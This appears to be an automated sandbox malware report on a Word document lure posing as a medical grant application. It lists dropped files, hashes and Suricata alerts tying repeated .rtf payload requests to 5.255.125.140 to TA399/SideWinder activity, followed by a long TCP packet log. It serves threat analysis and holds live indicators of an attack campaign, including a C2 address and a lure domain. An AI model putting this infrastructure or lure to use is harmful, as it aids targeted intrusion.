    Preview:L..................F.... ...7\b.r...7\b.r...Vtp.OM...:...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......YKY..user.8......QK.X.YKY*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:...YMY .SLNA_U~1.DOC..........WD..WD.*.........................S.L.N.A._.U.p.d.a.t.e.d._.M.e.d.i.c.a.l._.G.r.a.n.t._.A.p.p.l.i.c.a.t.i.o.n.(.1.)...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\SLNA_Updated_Medical_Grant_Application(1).docx.E.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.L.N.A._.U.p.d.a.t.e.d._.M.e.d.i.c.a.l._.G.r.a.n.t._.A.p.p.l.i.c.a.t.i.o.n.(.1.)...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.

    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [folders]
    Category:dropped
    Size (bytes):266
    Entropy (8bit):5.194794594184178
    Encrypted:false
    SSDEEP:6:Hw+YAuPaZ5SutAn+Ip10l69qb45HQ+pI45HQC:HwNAHHSuyn+IpU69G41rq41t
    MD5:A2BEB1D217A111FCB3B713924C06F8BA
    SHA1:70C331A30CA1641206F01BE07129702D5B87C703
    SHA-256:5D011E02E7C154018CF78E2FCBAD7BEAA8C38EA44C1C27B2E45ECDFFD51FBF52
    SHA-512:47B22EFE05BEE500E514798034D68423962E382BC941FA01914A55269A8447BEC861B6F242D97E96143F0F21F48CA846244D24C841D7B76BED61B39D5AEF0542
    Malicious:false
    Preview:[miscsers\user\AC:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat]..Profile.rtf.url=0..[folders]..11d601c6 on defence-lk.military-bd.org.url=0..SLNA_Updated_Medical_Grant_Application(1).LNK=0..[misc]..SLNA_Updated_Medical_Grant_Application(1).LNK=0..

    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

    C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:Qn:Qn
    MD5:F3B25701FE362EC84616A93A45CE9998
    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
    Malicious:false
    Preview:..

    C:\Users\user\Desktop\SLNA_Updated_Medical_Grant_Application(1).docx (copy)

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):19376
    Entropy (8bit):7.43519130998915
    Encrypted:false
    SSDEEP:384:+P76GaLYlB+k3chsh/5THXp9u1dZyQTXUdORYY8F6e:o6GaLYD+1w9XpWTEgRt0
    MD5:6E28C4287DFA9F9E5EA0EBDFCB55949D
    SHA1:6724B3E2722105459DED915204A65132A1A8E1BF
    SHA-256:47925F4C80AEEF33AFE0EA88FF0961ADD2D36B7842D3140C8E29847BB551F998
    SHA-512:91E3CCA72EB84DF355BCBE23ECD8217DB5C6504A61CE9C13E4957AA6B5FB6EE68707772661C0B72B3D9088F69DF0B92F012E2EA0EED9413D0CE622CED4F73250
    Malicious:false
    Preview:PK..........!................[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................OO.@...&~.f..].`..xP<*....v.....3(|{...5hQ...}..v.....J^!......'.p....r.4.K/E..\.*. .+@q=<=.LV.0a..\.....`.f>...G..o.L.._...y.w!.w..R.=.pp..ZT.....!.P.Hn..uV.T....T...KJ.I.X..s...1..P.|...=pi.) ..H..2.|.....g.~......hh..[.^."..VY.b.q[.o9..N!... .u'...<>A.g.....,A....R,.u.&.;......|...........F.........i.{T...h.;!.......0...Hn.q..y..?.{;.ju.}. ..vN...6.....z..P.6[/..=8.........;.......PK..........!..U~.....

    C:\Users\user\Desktop\~$NA_Updated_Medical_Grant_Application(1).docx

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

    C:\Users\user\Desktop\~WRD0000.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):19376
    Entropy (8bit):7.43519130998915
    Encrypted:false
    SSDEEP:384:+P76GaLYlB+k3chsh/5THXp9u1dZyQTXUdORYY8F6e:o6GaLYD+1w9XpWTEgRt0
    MD5:6E28C4287DFA9F9E5EA0EBDFCB55949D
    SHA1:6724B3E2722105459DED915204A65132A1A8E1BF
    SHA-256:47925F4C80AEEF33AFE0EA88FF0961ADD2D36B7842D3140C8E29847BB551F998
    SHA-512:91E3CCA72EB84DF355BCBE23ECD8217DB5C6504A61CE9C13E4957AA6B5FB6EE68707772661C0B72B3D9088F69DF0B92F012E2EA0EED9413D0CE622CED4F73250
    Malicious:false
    Preview:PK..........!................[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................OO.@...&~.f..].`..xP<*....v.....3(|{...5hQ...}..v.....J^!......'.p....r.4.K/E..\.*. .+@q=<=.LV.0a..\.....`.f>...G..o.L.._...y.w!.w..R.=.pp..ZT.....!.P.Hn..uV.T....T...KJ.I.X..s...1..P.|...=pi.) ..H..2.|.....g.~......hh..[.^."..VY.b.q[.o9..N!... .u'...<>A.g.....,A....R,.u.&.;......|...........F.........i.{T...h.;!.......0...Hn.q..y..?.{;.ju.}. ..vN...6.....z..P.6[/..=8.........;.......PK..........!..U~.....

    C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0

    Static File Info

    General

    File type:Microsoft OOXML
    Entropy (8bit):7.880031679106133
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 58.23%
    • Word Microsoft Office Open XML Format document (27504/1) 32.35%
    • ZIP compressed archive (8000/1) 9.41%
    File name:SLNA_Updated_Medical_Grant_Application(1).docx
    File size:15'041 bytes
    MD5:5a33bcadb199a553dd6ee2bdbdec4eea
    SHA1:0f318222204f14982f1579aac204812a253ea49d
    SHA256:8ae6cf2d0932782784084ff0e792a85146d5073115556e8d05a225e635ec96fa
    SHA512:b2022d56a87b6e4284f8c271b1d9c8ccf8289986acfd2147bf2f38a98e855bf8521706ef3e4adaceedc096d452e44163417d98134fbbb4413e54efbba3a2caa7
    SSDEEP:384:9iUQdLn9+GIEqFO5rgZy/UQR111POHIsTJyLO0U:Y7w7EqFYEU/fOBx
    TLSH:A962AEB0E497C062CB0342F4A15C6ED1BD4C9BE7E36B35BE752811C06C6369A4F2A422
    File Content Preview:PK.........@.Y.U~............._rels/.rels..MK.1.....!..;.*"..^D.Md..C2.........(......3y..3C.....+.4xW..(A........yX..JB....Wp.....b..#InJ......*.E..b.=[J....M..%...a .B...,o0.f@=a... n........o.A...;.N.<...v.."...e....b.R...1..R.EF..7Z.n...hY...j.y..#1'.

    File Icon

    Icon Hash:65e6a3a3afb7bdbf

    Network Behavior

    Suricata IDS Alerts

    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
    2024-12-13T12:10:43.753705+01002033858ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf 1192.168.2.22491645.255.125.140443TCP
    2024-12-13T12:10:43.753705+01002055081ET MALWARE TA399/Sidewinder Activity Payload Request M1, Microsoft Outlook UA Request for .rtf1192.168.2.22491645.255.125.140443TCP
    2024-12-13T12:10:43.753717+01002055129ET MALWARE Possible TA399/SideWinder Related Empty .rtf Inbound15.255.125.140443192.168.2.2249164TCP
    2024-12-13T12:10:52.188852+01002033858ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf 1192.168.2.22491685.255.125.140443TCP
    2024-12-13T12:10:52.188852+01002055081ET MALWARE TA399/Sidewinder Activity Payload Request M1, Microsoft Outlook UA Request for .rtf1192.168.2.22491685.255.125.140443TCP
    2024-12-13T12:10:52.189469+01002055129ET MALWARE Possible TA399/SideWinder Related Empty .rtf Inbound15.255.125.140443192.168.2.2249168TCP
    2024-12-13T12:11:04.001903+01002033858ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf 1192.168.2.22491745.255.125.140443TCP
    2024-12-13T12:11:04.001903+01002055081ET MALWARE TA399/Sidewinder Activity Payload Request M1, Microsoft Outlook UA Request for .rtf1192.168.2.22491745.255.125.140443TCP
    2024-12-13T12:11:04.002228+01002055129ET MALWARE Possible TA399/SideWinder Related Empty .rtf Inbound15.255.125.140443192.168.2.2249174TCP

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Dec 13, 2024 12:10:30.289742947 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:30.289773941 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:30.289865017 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:30.301930904 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:30.301947117 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.055875063 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.055989027 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.060239077 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.060246944 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.060645103 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.060703993 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.188606977 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.231342077 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.610483885 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.610564947 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.610603094 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.610632896 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.667865038 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.667896032 CET443491615.255.125.140192.168.2.22
    Dec 13, 2024 12:10:32.667907000 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:32.667944908 CET49161443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:34.223263025 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:34.223306894 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:34.223412991 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:34.223997116 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:34.224014044 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:35.586493015 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:35.586644888 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:35.590483904 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:35.590492964 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:35.590790987 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:35.596483946 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:35.643335104 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:36.121901989 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:36.122075081 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:36.122160912 CET49162443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:36.122209072 CET443491625.255.125.140192.168.2.22
    Dec 13, 2024 12:10:39.894501925 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:39.894557953 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:39.894699097 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:39.898637056 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:39.898663998 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.258089066 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.258385897 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.262104034 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.262120962 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.262398005 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.276007891 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.319338083 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.790649891 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.791805029 CET443491635.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.791809082 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.791943073 CET49163443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.825912952 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.825951099 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:41.826054096 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.826509953 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:41.826534033 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.193114042 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.193236113 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.194677114 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.194685936 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.195983887 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.195991039 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.753530979 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.753602982 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.753643990 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.753678083 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.759479046 CET49164443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.759500980 CET443491645.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.779337883 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.779386997 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:43.779478073 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.779906988 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:43.779944897 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.137238026 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.137387037 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.138772964 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.138792992 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.140290976 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.140300035 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.668703079 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.668821096 CET443491655.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.668867111 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.672396898 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.672396898 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.672427893 CET49165443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.721568108 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.721626043 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:45.721715927 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.723047018 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:45.723057985 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.089168072 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.089382887 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.090787888 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.090802908 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.091917992 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.091929913 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.622312069 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.622395039 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.622562885 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.622562885 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.622878075 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.622878075 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:47.622903109 CET443491665.255.125.140192.168.2.22
    Dec 13, 2024 12:10:47.623334885 CET49166443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:48.373406887 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:48.373445034 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:48.373493910 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:48.382386923 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:48.382399082 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:49.744813919 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:49.744976044 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:49.749025106 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:49.749041080 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:49.749355078 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:49.751399040 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:49.799333096 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:50.279473066 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:50.279637098 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:50.279700994 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.279701948 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.279701948 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.279732943 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:50.285768032 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.285809040 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:50.286118031 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.286118031 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.286145926 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:50.586805105 CET49167443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:50.586827993 CET443491675.255.125.140192.168.2.22
    Dec 13, 2024 12:10:51.650618076 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:51.650790930 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:51.652337074 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:51.652348995 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:51.653883934 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:51.653896093 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:52.189052105 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:52.189213991 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.189227104 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:52.189255953 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:52.189286947 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.189328909 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.232356071 CET49168443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.232379913 CET443491685.255.125.140192.168.2.22
    Dec 13, 2024 12:10:52.248871088 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.248900890 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:52.248955011 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.249259949 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:52.249274015 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:53.614561081 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:53.614703894 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:53.616173983 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:53.616183996 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:53.617563963 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:53.617571115 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:54.149108887 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:54.149343014 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.149352074 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:54.149388075 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.149403095 CET443491695.255.125.140192.168.2.22
    Dec 13, 2024 12:10:54.149415970 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.149458885 CET49169443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.171468973 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.171519041 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:54.171586037 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.171905994 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:54.171920061 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:55.536179066 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:55.536398888 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:55.568742037 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:55.568756104 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:55.601672888 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:55.601697922 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.072252035 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.072326899 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.072340012 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.072382927 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.072390079 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.072429895 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.072463989 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.072508097 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.072649956 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.072666883 CET443491705.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.072670937 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.072772980 CET49170443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.075261116 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.075319052 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:56.075407028 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.075690985 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:56.075712919 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.435098886 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.435239077 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.436722040 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.436739922 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.438086033 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.438107014 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.967058897 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.967150927 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.967160940 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.967293024 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.967562914 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.967562914 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.967586040 CET443491715.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.967703104 CET49171443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.972533941 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.972584963 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:57.972639084 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.972934961 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:57.972950935 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.338320971 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.338465929 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.339982986 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.339996099 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.341398001 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.341409922 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.866611004 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.866699934 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.866708994 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.866754055 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.866759062 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.866799116 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.867028952 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.867043018 CET443491725.255.125.140192.168.2.22
    Dec 13, 2024 12:10:59.867053986 CET49172443192.168.2.225.255.125.140
    Dec 13, 2024 12:10:59.867091894 CET49172443192.168.2.225.255.125.140
